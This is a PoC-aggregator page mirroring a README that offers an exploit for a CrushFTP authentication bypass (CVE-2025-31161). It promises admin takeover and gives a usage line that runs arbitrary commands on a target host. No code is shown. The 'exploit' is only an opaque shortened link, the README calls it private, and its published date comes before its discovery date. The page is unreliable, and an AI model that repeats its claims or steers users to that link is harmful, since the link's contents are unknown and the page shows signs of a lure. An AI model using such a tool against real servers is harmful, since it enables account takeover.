Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-31161 PoC — CrushFTP 安全漏洞

Source
https://github.com/llussiess/CVE-2025-31161
Associated Vulnerability
Title:CrushFTP 安全漏洞 (CVE-2025-31161)
Description:CrushFTP是CrushFTP公司的一款文件传输服务器。 CrushFTP 10.8.4之前的10.x本和11.3.1之前的11.x版本存在安全漏洞,该漏洞源于认证绕过漏洞,可能导致账户接管。
Readme

# Authentication Bypass by Primary Weakness CrushFTP (CVE-2025-31161)

## Overview

Authentication bypass vulnerability in CrushFTP versions 10.0.0 to 10.8.3 and 11.0.0 to 11.3.0. The vulnerability exists in the AWS4-HMAC authorization method of the HTTP component of the FTP server.

## Details

- **CVE ID**: [CVE-2025-31161](https://nvd.nist.gov/vuln/detail/CVE-2025-31161)
- **Discovered**: 2025-03-30
- **Published**: 2024-04-03
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## Vulnerability Description

An unauthenticated attacker can : - Bypass authentication completely - Gain access to the crushadmin account - Fully compromise the CrushFTP server - Obtain administrative privileges - Potentially access, modify, or delete sensitive data - Take complete control of the affected system


## Affected Versions

**CrushFTP** 

10.0.0 to 10.8.3 and 11.0.0 to 11.3.0.


## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```


## Exploit:
### [https://bit.ly/4id6jeT]
File Snapshot

 [4.0K]  /data/pocs/5745daf9210e40574c2eb9a89150a462fb94fc74
└── [1.0K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.